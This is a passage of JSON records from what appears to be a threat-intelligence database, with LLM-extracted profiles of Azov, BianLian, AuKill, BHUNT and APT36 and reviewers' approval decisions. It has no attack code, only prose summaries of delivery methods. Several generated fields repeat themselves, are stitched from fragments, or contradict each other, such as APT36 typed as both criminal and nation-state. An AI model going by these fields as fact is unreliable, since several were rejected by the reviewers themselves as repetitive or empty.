  "threat_actor_overview": "The Azov Ransomware is a data wiper that intentionally destroys victims' data and infects other programs. It is distributed through cracks and pirated software. The malware includes a trigger time that would cause it to sit dormant on the victim's devices until a specific date and time,  which would then trigger the corruption of all data on the device. The threat actor continues distributing the malware through the Smokeloader botnet,  commonly found in fake pirated software and crack sites., The threat actor is distributing a malware called 'Azov Ransomware' through cracks and pirated software. The malware is a data wiper that intentionally destroys victims' data and infects other programs. It includes a trigger time that would cause it to sit dormant on the victim's devices until a specific date and time,  which would then trigger the corruption of all data on the device. The malware is distributed through the Smokeloader botnet, The threat actor is distributing a malware called 'Azov Ransomware' through cracks and pirated software. The malware is a data wiper that intentionally destroys victims' data and infects other programs. It is distributed through the Smokeloader botnet,  which would then trigger the corruption of all data on the device. The malware is being distributed through the Smokeloader botnet",
  "aliases": [
    "Azov Ransomware"
  ],
  "sources": [
    "Checkpoint security researcher Ji Vinopal",
    "BleepingComputer"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Notoriety"
  ],
  "threat_actor_intent": [
    "Damage and Destruction"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual"
  ],
  "threat_actor_type": [
    "criminal",
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "Victims who are infected with Azov Ransomware should reinstall Windows to be safe. As Smokeloader is being used to distribute the Azov data wiper,  it is likely also installed with other malware,  such as password-stealing malware. Therefore,  it is essential to reset any passwords to email accounts,  financial services,  or other sensitive information., Reinstall Windows, Reset passwords to email accounts, financial services, or other sensitive information",
  "attack_consequences": "Victims who are infected with Azov Ransomware will have no way of recovering their files,  and as other executables are infected,  they should reinstall Windows to be safe., Victims' data is destroyed and other programs are infected. The victims have no way of recovering their files., Data corruption, Infection of other programs, The malware corrupts data on the victim's device,  making it impossible to recover the files. It also infects other executables,  potentially causing further damage.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Azov Ransomware, Unknown\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Victims who are infected with Azov Ransomware should reinstall Windows to be safe. As Smokeloader is being used to distribute the Azov data wiper,  it is likely also installed with other malware,  such as password-stealing malware. Therefore,  it is essential to reset any passwords to email accounts,  financial services,  or other sensitive information., Reinstall Windows, Reset passwords to email accounts, financial services, or other sensitive information\", \"attack_consequences\": \"Victims who are infected with Azov Ransomware will have no way of recovering their files,  and as other executables are infected,  they should reinstall Windows to be safe., Victims' data is destroyed and other programs are infected. The victims have no way of recovering their files., Data corruption, Infection of other programs, The malware corrupts data on the victim's device,  making it impossible to recover the files. It also infects other executables,  potentially causing further damage.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Azov Ransomware is a data wiper that intentionally destroys victims' data and infects other programs. It is distributed through cracks and pirated software. The malware includes a trigger time that would cause it to sit dormant on the victim's devices until a specific date and time,  which would then trigger the corruption of all data on the device. The threat actor continues distributing the malware through the Smokeloader botnet,  commonly found in fake pirated software and crack sites., The threat actor is distributing a malware called 'Azov Ransomware' through cracks and pirated software. The malware is a data wiper that intentionally destroys victims' data and infects other programs. It includes a trigger time that would cause it to sit dormant on the victim's devices until a specific date and time,  which would then trigger the corruption of all data on the device. The malware is distributed through the Smokeloader botnet, The threat actor is distributing a malware called 'Azov Ransomware' through cracks and pirated software. The malware is a data wiper that intentionally destroys victims' data and infects other programs. It is distributed through the Smokeloader botnet,  which would then trigger the corruption of all data on the device. The malware is being distributed through the Smokeloader botnet\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Damage and Destruction\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Notoriety\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_type\": [\"criminal\", \"unknown\"], \"aliases\": [\"Azov Ransomware\"], \"vulnerabilities\": [], \"sources\": [\"Checkpoint security researcher Ji Vinopal\", \"BleepingComputer\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Azov Ransomware\", \"Unknown\"], \"aliases\": [\"Azov Ransomware\"], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"The Azov Ransomware is a data wiper that intentionally destroys victims' data and infects other programs. It is distributed through cracks and pirated software. The malware includes a trigger time that would cause it to sit dormant on the victim's devices until a specific date and time\", \" which would then trigger the corruption of all data on the device. The threat actor continues distributing the malware through the Smokeloader botnet\", \" commonly found in fake pirated software and crack sites.\", \"The threat actor is distributing a malware called 'Azov Ransomware' through cracks and pirated software. The malware is a data wiper that intentionally destroys victims' data and infects other programs. It includes a trigger time that would cause it to sit dormant on the victim's devices until a specific date and time\", \" which would then trigger the corruption of all data on the device. The malware is distributed through the Smokeloader botnet\", \"The threat actor is distributing a malware called 'Azov Ransomware' through cracks and pirated software. The malware is a data wiper that intentionally destroys victims' data and infects other programs. It is distributed through the Smokeloader botnet\", \" which would then trigger the corruption of all data on the device. The malware is being distributed through the Smokeloader botnet\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Damage and Destruction\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Notoriety\", \"Disruption of Service\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_sophistication\": [\"intermediate\", \"advanced\"], \"threat_actor_type\": [\"criminal\", \"unknown\"], \"attack_mitigations\": [\"Victims who are infected with Azov Ransomware should reinstall Windows to be safe. As Smokeloader is being used to distribute the Azov data wiper\", \" it is likely also installed with other malware\", \" such as password-stealing malware. Therefore\", \" it is essential to reset any passwords to email accounts\", \" financial services\", \" or other sensitive information.\", \"Reinstall Windows\", \"Reset passwords to email accounts, financial services, or other sensitive information\"], \"attack_consequences\": [\"Victims who are infected with Azov Ransomware will have no way of recovering their files\", \" and as other executables are infected\", \" they should reinstall Windows to be safe.\", \"Victims' data is destroyed and other programs are infected. The victims have no way of recovering their files.\", \"Data corruption\", \"Infection of other programs\", \"The malware corrupts data on the victim's device\", \" making it impossible to recover the files. It also infects other executables\", \" potentially causing further damage.\"], \"vulnerabilities\": [], \"sources\": [\"Checkpoint security researcher Ji Vinopal\", \"BleepingComputer\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-27T20:47:11.235Z"
  },
  "approval_message": "Rerun it. Mitigation and Consequence is too repetitive and there isn't any information in the Scope of the Attack.",
  "change_log": [],
  "threat_actor": "Azov Ransomware, Unknown"
},
{
  "_id": {
    "$oid": "6504c7193a4a45d555321aa8"
  },
  "report": {
    "$oid": "6504c5de7af35aa6d9de6ca9"
  },
  "threat_actor_overview": "",
  "aliases": [],
  "sources": [
    "CISA",
    "Fortinet"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [],
  "threat_actor_intent": [],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [],
  "threat_actor_type": [],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"BianLian Ransomware Group\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_type\": [], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"CISA\", \"Fortinet\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"BianLian Ransomware Group\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_sophistication\": [], \"threat_actor_type\": [], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"CISA\", \"Fortinet\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-29T18:26:36.498Z"
  },
  "approval_message": "No content",
  "change_log": [],
  "threat_actor": "BianLian Ransomware Group"
},
{
  "_id": {
    "$oid": "6508939e8bb1304f28fafacd"
  },
  "report": {
    "$oid": "6508937d76c6117df3c23ef7"
  },
  "threat_actor_overview": "The threat actor has been involved in multiple ransomware incidents since the beginning of 2023,  using a defense evasion tool dubbed AuKill. This tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility,  Process Explorer,  to disable EDR processes before deploying either a backdoor or ransomware on the target system.",
  "aliases": [
    "AuKill"
  ],
  "sources": [
    "Sophos X-Ops"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "Disruption of Service",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Unknown\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"Disruption of Service\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The threat actor has been involved in multiple ransomware incidents since the beginning of 2023,  using a defense evasion tool dubbed AuKill. This tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility,  Process Explorer,  to disable EDR processes before deploying either a backdoor or ransomware on the target system.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\"], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [\"AuKill\"], \"vulnerabilities\": [], \"sources\": [\"Sophos X-Ops\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Unknown\"], \"aliases\": [\"AuKill\"], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"The threat actor has been involved in multiple ransomware incidents since the beginning of 2023\", \" using a defense evasion tool dubbed AuKill. This tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility\", \" Process Explorer\", \" to disable EDR processes before deploying either a backdoor or ransomware on the target system.\"], \"target_populations\": [], \"target_industry_sectors\": [], \"threat_actor_intent\": [\"Disruption of Service\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_sophistication\": [\"intermediate\"], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [], \"attack_consequences\": [\"Disruption of Service\"], \"vulnerabilities\": [], \"sources\": [\"Sophos X-Ops\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-28T20:22:29.538Z"
  },
  "approval_message": "Rerun, zero info in the scope of the attack.",
  "change_log": [
    {
      "_id": {
        "$oid": "650893ae76c6117df3c23ef8"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-18T18:15:10.357Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Unknown",
          "updated_value": "Aukill"
        }
      ]
    }
  ],
  "threat_actor": "Aukill"
},
{
  "_id": {
    "$oid": "6509c2d33f9addd6209fe3af"
  },
  "report": {
    "$oid": "6509c2a433b5c31fe0e4ac6f"
  },
  "threat_actor_overview": "The threat actor is responsible for the creation and distribution of the BHUNT malware,  a modular crypto-wallet stealing malware. The malware is stealthy,  heavily encrypted,  and packed using Themida and VMProtect to evade detection. It is injected into explorer.exe and is likely delivered via KMSpico downloads., BHUNT is a modular crypto-wallet stealing malware that targets cryptocurrency wallet contents,  passwords,  and security phrases. It is stealthy,  and packed using Themida and VMProtect to evade detection. It is injected into explorer.exe and likely delivered via KMSpico downloads.",
  "aliases": [],
  "sources": [
    "Bitdefender",
    "Bleeping Computer"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Financial Theft",
    "Information Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "IN"
  ],
  "target_regions": [
    "asia"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df"
  ],
  "attack_mitigations": "Avoid downloading pirated software,  cracks,  and illegitimate product activators.",
  "attack_consequences": "The threat actor can gain access to the wallet's seed or configuration file,  import the wallet on their own devices,  and steal the contained cryptocurrency. In addition,  the malware can harvest passwords and cookies stored in browser caches,  potentially leading to an online identity takeover., The threat actor gains access to the wallet's seed or configuration file,  imports the wallet on their own devices,  and steals the contained cryptocurrency. It can also harvest passwords and cookies stored in browser caches,  and steal the contained cryptocurrency. In addition to financial loss,  the malware can also harvest passwords and cookies stored in browser caches,  which they can use to import the wallet on their own devices and steal the contained cryptocurrency. In addition to cryptocurrency wallets,  which they can use to import the wallet on their own devices and steal the contained cryptocurrency. The malware can also harvest passwords and cookies stored in browser caches,  which might include account passwords for social media,  banking,  etc. that might even result in an online identity takeover.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Unknown, BHUNT\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Avoid downloading pirated software,  cracks,  and illegitimate product activators.\", \"attack_consequences\": \"The threat actor can gain access to the wallet's seed or configuration file,  import the wallet on their own devices,  and steal the contained cryptocurrency. In addition,  the malware can harvest passwords and cookies stored in browser caches,  potentially leading to an online identity takeover., The threat actor gains access to the wallet's seed or configuration file,  imports the wallet on their own devices,  and steals the contained cryptocurrency. It can also harvest passwords and cookies stored in browser caches,  and steal the contained cryptocurrency. In addition to financial loss,  the malware can also harvest passwords and cookies stored in browser caches,  which they can use to import the wallet on their own devices and steal the contained cryptocurrency. In addition to cryptocurrency wallets,  which they can use to import the wallet on their own devices and steal the contained cryptocurrency. The malware can also harvest passwords and cookies stored in browser caches,  which might include account passwords for social media,  banking,  etc. that might even result in an online identity takeover.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The threat actor is responsible for the creation and distribution of the BHUNT malware,  a modular crypto-wallet stealing malware. The malware is stealthy,  heavily encrypted,  and packed using Themida and VMProtect to evade detection. It is injected into explorer.exe and is likely delivered via KMSpico downloads., BHUNT is a modular crypto-wallet stealing malware that targets cryptocurrency wallet contents,  passwords,  and security phrases. It is stealthy,  and packed using Themida and VMProtect to evade detection. It is injected into explorer.exe and likely delivered via KMSpico downloads.\", \"target_countries\": [\"IN\"], \"target_regions\": [\"asia\"], \"target_populations\": [], \"threat_actor_intent\": [\"Financial Theft\", \"Information Theft\"], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Bitdefender\", \"Bleeping Computer\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Unknown\", \"BHUNT\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"IN\"], \"target_regions\": [\"asia\"], \"threat_actor_overview\": [\"The threat actor is responsible for the creation and distribution of the BHUNT malware\", \" a modular crypto-wallet stealing malware. The malware is stealthy\", \" heavily encrypted\", \" and packed using Themida and VMProtect to evade detection. It is injected into explorer.exe and is likely delivered via KMSpico downloads.\", \"BHUNT is a modular crypto-wallet stealing malware that targets cryptocurrency wallet contents\", \" passwords\", \" and security phrases. It is stealthy\", \" and packed using Themida and VMProtect to evade detection. It is injected into explorer.exe and likely delivered via KMSpico downloads.\"], \"target_populations\": [], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_intent\": [\"Financial Theft\", \"Information Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"individual\"], \"threat_actor_sophistication\": [\"intermediate\", \"advanced\"], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [\"Avoid downloading pirated software\", \" cracks\", \" and illegitimate product activators.\"], \"attack_consequences\": [\"The threat actor can gain access to the wallet's seed or configuration file\", \" import the wallet on their own devices\", \" and steal the contained cryptocurrency. In addition\", \" the malware can harvest passwords and cookies stored in browser caches\", \" potentially leading to an online identity takeover.\", \"The threat actor gains access to the wallet's seed or configuration file\", \" imports the wallet on their own devices\", \" and steals the contained cryptocurrency. It can also harvest passwords and cookies stored in browser caches\", \" and steal the contained cryptocurrency. In addition to financial loss\", \" the malware can also harvest passwords and cookies stored in browser caches\", \" which they can use to import the wallet on their own devices and steal the contained cryptocurrency. In addition to cryptocurrency wallets\", \" which they can use to import the wallet on their own devices and steal the contained cryptocurrency. The malware can also harvest passwords and cookies stored in browser caches\", \" which might include account passwords for social media\", \" banking\", \" etc. that might even result in an online identity takeover.\"], \"vulnerabilities\": [], \"sources\": [\"Bitdefender\", \"Bleeping Computer\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "approval_status_changed_on": {
    "$date": "2023-09-28T20:24:43.290Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "65130e69fb98828071a98b2b"
      },
      "updated_by": "aBBE77QoFYdpJwju50t49rKS3s02",
      "updated_on": {
        "$date": "2023-09-26T17:01:29.784Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Unknown, BHUNT",
          "updated_value": "BHUNT"
        }
      ]
    }
  ],
  "threat_actor": "BHUNT"
},
{
  "_id": {
    "$oid": "6509d8db99b75237057a6077"
  },
  "report": {
    "$oid": "6509d876cfaca2208ddff60a"
  },
  "threat_actor_overview": "BianLian is a ransomware threat actor whose modus operandi is to add victims to its own data leak site in June 2022. BianLian also refers to the file encryptor (ransomware) used by the threat actor. Victims reportedly include critical infrastructure organizations in the U.S. and Australia.",
  "aliases": [],
  "sources": [
    "FortiGuard Labs",
    "CISA"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US",
    "AU"
  ],
  "target_regions": [
    "americas",
    "oceania"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--f3f4f4e2-1810-4df2-a7ac-a65c9388ed23"
  ],
  "attack_mitigations": "Keeping all AV and IPS signatures up to date, Making foundational changes to the frequency, location, and security of their data backups, Investigating cloud-based security solutions, such as SASE, to protect off-network devices, Investigating advanced endpoint security, such as EDR (endpoint detection and response) solutions, Investigating Zero Trust Access and network segmentation strategies, Investigating advanced endpoint security, such as EDR (endpoint detection and response) solutions that can disrupt malware mid-attack, Investigating Zero Trust Access and network segmentation strategies that restrict access to applications and resources based on policy and context, Investigating Cloud-based security solutions, such as SASE, to protect off-network devices, Advanced endpoint security, such as EDR (endpoint detection and response) solutions, Zero Trust Access and network segmentation strategies",
  "attack_consequences": "Loss of data due to exfiltration, Unwanted downtime, Damage to an organization's reputation",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"BianLian\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Keeping all AV and IPS signatures up to date, Making foundational changes to the frequency, location, and security of their data backups, Investigating cloud-based security solutions, such as SASE, to protect off-network devices, Investigating advanced endpoint security, such as EDR (endpoint detection and response) solutions, Investigating Zero Trust Access and network segmentation strategies, Investigating advanced endpoint security, such as EDR (endpoint detection and response) solutions that can disrupt malware mid-attack, Investigating Zero Trust Access and network segmentation strategies that restrict access to applications and resources based on policy and context, Investigating Cloud-based security solutions, such as SASE, to protect off-network devices, Advanced endpoint security, such as EDR (endpoint detection and response) solutions, Zero Trust Access and network segmentation strategies\", \"attack_consequences\": \"Loss of data due to exfiltration, Unwanted downtime, Damage to an organization's reputation\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"BianLian is a ransomware threat actor whose modus operandi is to add victims to its own data leak site in June 2022. BianLian also refers to the file encryptor (ransomware) used by the threat actor. Victims reportedly include critical infrastructure organizations in the U.S. and Australia.\", \"target_countries\": [\"US\", \"AU\"], \"target_regions\": [\"americas\", \"oceania\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [\"infrastructure\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"FortiGuard Labs\", \"CISA\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"BianLian\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"US\", \"AU\"], \"target_regions\": [\"americas\", \"oceania\"], \"threat_actor_overview\": [\"BianLian is a ransomware threat actor whose modus operandi is to add victims to its own data leak site in June 2022. BianLian also refers to the file encryptor (ransomware) used by the threat actor. Victims reportedly include critical infrastructure organizations in the U.S. and Australia.\"], \"target_populations\": [], \"target_industry_sectors\": [\"infrastructure\"], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [], \"threat_actor_type\": [\"criminal\"], \"attack_mitigations\": [\"Keeping all AV and IPS signatures up to date\", \"Making foundational changes to the frequency, location, and security of their data backups\", \"Investigating cloud-based security solutions, such as SASE, to protect off-network devices\", \"Investigating advanced endpoint security, such as EDR (endpoint detection and response) solutions\", \"Investigating Zero Trust Access and network segmentation strategies\", \"Investigating advanced endpoint security, such as EDR (endpoint detection and response) solutions that can disrupt malware mid-attack\", \"Investigating Zero Trust Access and network segmentation strategies that restrict access to applications and resources based on policy and context\", \"Investigating Cloud-based security solutions, such as SASE, to protect off-network devices\", \"Advanced endpoint security, such as EDR (endpoint detection and response) solutions\", \"Zero Trust Access and network segmentation strategies\"], \"attack_consequences\": [\"Loss of data due to exfiltration\", \"Unwanted downtime\", \"Damage to an organization's reputation\"], \"vulnerabilities\": [], \"sources\": [\"FortiGuard Labs\", \"CISA\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "approval_status_changed_on": {
    "$date": "2023-09-28T17:57:51.785Z"
  },
  "approval_message": "",
  "change_log": [],
  "threat_actor": "BianLian"
},
{
  "_id": {
    "$oid": "6509dc0899b75237057a6078"
  },
  "report": {
    "$oid": "6509dbe8cfaca2208ddff60b"
  },
  "threat_actor_overview": "APT36 is a threat actor that has been involved in a recent malware campaign,  using stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. The attackers have hijacked the infrastructure of an undisclosed Colombian cooperative bank and stolen a total of 418, 777 records containing sensitive customer data., APT36 is a state-sponsored threat actor known for its malware campaigns. In a recent campaign,  they used stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. They also targeted Android devices using YouTube app clones., APT36 is a state-sponsored threat actor group known for its cyber espionage campaigns. In this instance,  they have been involved in a malware campaign using stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan., APT36 is a threat actor group that has been involved in a recent malware campaign. They have been using stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. They have also been found to infect Android devices using YouTube app clones.",
  "aliases": [],
  "sources": [
    "Qualys"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain",
    "Espionage"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [
    "individual",
    "team",
    "government",
    "organization"
  ],
  "threat_actor_type": [
    "criminal",
    "nation-state",
    "crime-syndicate"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "CO"
  ],
  "target_regions": [
    "americas"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df"
  ],
  "attack_mitigations": "",
  "attack_consequences": "The malware is delivered to victims' computers via a malicious Excel file that drops and executes an INF file encoded within a highly obfuscated macro bundled with the attachment. The final BitRAT payload is then downloaded from a GitHub repository using the WinHTTP library on the compromised device and executed with the help of the WinExec function. During the last stage of the attack, the RAT malware moves its loader to the Windows startup folder to gain persistence and automatically restart after system reboots., Information Theft, Financial Theft, The attackers have stolen a total of 418, 777 records containing sensitive customer data,  including names,  phone numbers,  email addresses,  addresses,  Colombian national IDs,  payment records,  and salary information from the breached servers of a Colombian cooperative bank.",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"APT36\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"The malware is delivered to victims' computers via a malicious Excel file that drops and executes an INF file encoded within a highly obfuscated macro bundled with the attachment. The final BitRAT payload is then downloaded from a GitHub repository using the WinHTTP library on the compromised device and executed with the help of the WinExec function. During the last stage of the attack, the RAT malware moves its loader to the Windows startup folder to gain persistence and automatically restart after system reboots., Information Theft, Financial Theft, The attackers have stolen a total of 418, 777 records containing sensitive customer data,  including names,  phone numbers,  email addresses,  addresses,  Colombian national IDs,  payment records,  and salary information from the breached servers of a Colombian cooperative bank.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"APT36 is a threat actor that has been involved in a recent malware campaign,  using stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. The attackers have hijacked the infrastructure of an undisclosed Colombian cooperative bank and stolen a total of 418, 777 records containing sensitive customer data., APT36 is a state-sponsored threat actor known for its malware campaigns. In a recent campaign,  they used stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. They also targeted Android devices using YouTube app clones., APT36 is a state-sponsored threat actor group known for its cyber espionage campaigns. In this instance,  they have been involved in a malware campaign using stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan., APT36 is a threat actor group that has been involved in a recent malware campaign. They have been using stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. They have also been found to infect Android devices using YouTube app clones.\", \"target_countries\": [\"CO\"], \"target_regions\": [\"americas\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"individual\", \"team\", \"government\", \"organization\"], \"threat_actor_type\": [\"criminal\", \"nation-state\", \"crime-syndicate\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Qualys\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"APT36\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"CO\"], \"target_regions\": [\"americas\"], \"threat_actor_overview\": [\"APT36 is a threat actor that has been involved in a recent malware campaign\", \" using stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. The attackers have hijacked the infrastructure of an undisclosed Colombian cooperative bank and stolen a total of 418\", \"777 records containing sensitive customer data.\", \"APT36 is a state-sponsored threat actor known for its malware campaigns. In a recent campaign\", \" they used stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. They also targeted Android devices using YouTube app clones.\", \"APT36 is a state-sponsored threat actor group known for its cyber espionage campaigns. In this instance\", \" they have been involved in a malware campaign using stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan.\", \"APT36 is a threat actor group that has been involved in a recent malware campaign. They have been using stolen information of bank customers in Colombia as lures in phishing emails designed to infect targets with the BitRAT remote access trojan. They have also been found to infect Android devices using YouTube app clones.\"], \"target_populations\": [], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\"], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"individual\", \"team\", \"government\", \"organization\"], \"threat_actor_sophistication\": [\"advanced\", \"intermediate\"], \"threat_actor_type\": [\"criminal\", \"nation-state\", \"crime-syndicate\"], \"attack_mitigations\": [], \"attack_consequences\": [\"The malware is delivered to victims' computers via a malicious Excel file that drops and executes an INF file encoded within a highly obfuscated macro bundled with the attachment. The final BitRAT payload is then downloaded from a GitHub repository using the WinHTTP library on the compromised device and executed with the help of the WinExec function. During the last stage of the attack, the RAT malware moves its loader to the Windows startup folder to gain persistence and automatically restart after system reboots.\", \"Information Theft\", \"Financial Theft\", \"The attackers have stolen a total of 418\", \"777 records containing sensitive customer data\", \" including names\", \" phone numbers\", \" email addresses\", \" addresses\", \" Colombian national 